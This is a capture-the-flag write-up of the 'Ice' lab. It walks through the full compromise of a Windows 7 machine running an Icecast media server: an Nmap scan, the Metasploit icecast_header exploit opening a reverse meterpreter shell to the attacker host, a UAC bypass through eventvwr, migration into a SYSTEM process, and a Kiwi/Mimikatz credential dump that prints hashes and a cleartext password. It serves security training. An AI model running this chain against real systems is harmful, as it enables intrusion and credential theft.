🧊Ice

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

1. Reconnaissance

1.1 Nmap

nmap -sS -sV -Pn -p- 10.10.32.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 20:52 IST
Nmap scan report for 10.10.32.87
Host is up (0.56s latency).
Not shown: 65525 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
5357/tcp  open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http        Icecast streaming media server
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49158/tcp open  msrpc       Microsoft Windows RPC
49159/tcp open  msrpc       Microsoft Windows RPC
49160/tcp open  msrpc       Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 687.26 seconds

Here we find that there is as http server running Icecast streaming media server on an unusual pot 8000

2. Gaining access

2.1 Metasploit

Searching metasploit for icecast exploits

msf6 > search icecast

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.32.87RHOSTS => 10.10.32.87

msf6 exploit(windows/http/icecast_header) > set LHOST tun0
LHOST => tun0

msf6 exploit(windows/http/icecast_header) > exploit

[*] Started reverse TCP handler on 10.11.66.165:4444 
[*] Sending stage (175174 bytes) to 10.10.32.87
[*] Meterpreter session 1 opened (10.11.66.165:4444 -> 10.10.32.87:49173 ) at 2022-03-19 20:56:08 +0530


meterpreter > getuid
Server username: Dark-PC\Dark

meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

We are logged in as user Dark with no privileges

3. Privilege Escalation

3.1 UAC Bypass

Running metasploit module post/multi/recon/local_exploit_suggester in the meterpreter session for finding any potential vulnerabilities

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.32.87 - Collecting local exploits for x86/windows...
[*] 10.10.32.87 - 40 exploit checks are being tried...
[+] 10.10.32.87 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[-] 10.10.32.87 - Post interrupted by the console user

We find the target is vulnerable to the exploit/windows/local/bypassuac_eventvwr module
Backgrounding the current meterpreter session with Ctrl + Z, we use the suggested module and provide the session number of our backgrounded session

meterpreter > 
Background session 1? [y/N]

msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/bypassuac_eventvwr

[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST tun0
LHOST => tun0

msf6 exploit(windows/local/bypassuac_eventvwr) > exploit

[*] Started reverse TCP handler on 10.11.66.165:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.32.87
[*] Meterpreter session 2 opened (10.11.66.165:4444 -> 10.10.32.87:49195 ) at 2022-03-19 21:08:51 +0530
[*] Cleaning up registry keys ...

meterpreter > getuid
Server username: Dark-PC\Dark

meterpreter > ps -aux

Process List
============

 PID   PPID  Name      Arch  Session  User          Path
 ---   ----  ----      ----  -------  ----          ----
 0     0     [System
             Process]
 4     0     System    x64   0
===================================================================
 656   588   winlogon  x64   1        NT AUTHORITY  C:\Windows\S
             .exe                     \SYSTEM       ystem32\winl
                                                    ogon.exe
 696   596   services  x64   0        NT AUTHORITY  C:\Windows\S
             .exe                     \SYSTEM       ystem32\serv
                                                    ices.exe
 704   596   lsass.ex  x64   0        NT AUTHORITY  C:\Windows\S
             e                        \SYSTEM       ystem32\lsas
                                                    s.exe
======================================================================                       
 
 1328  1304  explorer  x64   1        Dark-PC\Dark  C:\Windows\e
             .exe                                   xplorer.exe
 1368  696   spoolsv.  x64   0        NT AUTHORITY  C:\Windows\S
             exe                      \SYSTEM       ystem32\spoo
                                                    lsv.exe
 1396  696   svchost.  x64   0        NT AUTHORITY  C:\Windows\S
             exe                      \LOCAL SERVI  ystem32\svch
                                      CE            ost.exe
 1436  696   taskhost  x64   1        Dark-PC\Dark  C:\Windows\S
             .exe                                   ystem32\task
                                                    host.exe
 ===================================================================

After using the module, we find that there are certain processes running as NT AUTHORITY\SYSTEM which is equivalent to the root user in linux.
We can also verify this if we could get names of privileged proccecess when running the getprivs command in the meterpreter session.
Right now we are the user Dark, but we can migrate to NT AUTHORITY\SYSTEM by using the migrate command and specifying the process name of any process running as NT AUTHORITY\SYSTEM.

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 1492 to 1368...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now we are NT AUTHORITY\SYSTEM

3.2 Kiwi

Mimikatz is a rather infamous password dumping tool that is incredibly useful. Loading using the command load kiwi (Kiwi is the updated version of Mimikatz)
using the command creds_all in kiwi to list all credentials

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

All the password hashes and passwords are dumped.

PreviousHA Jocker CTF NextIgnite

Last updated 3 years ago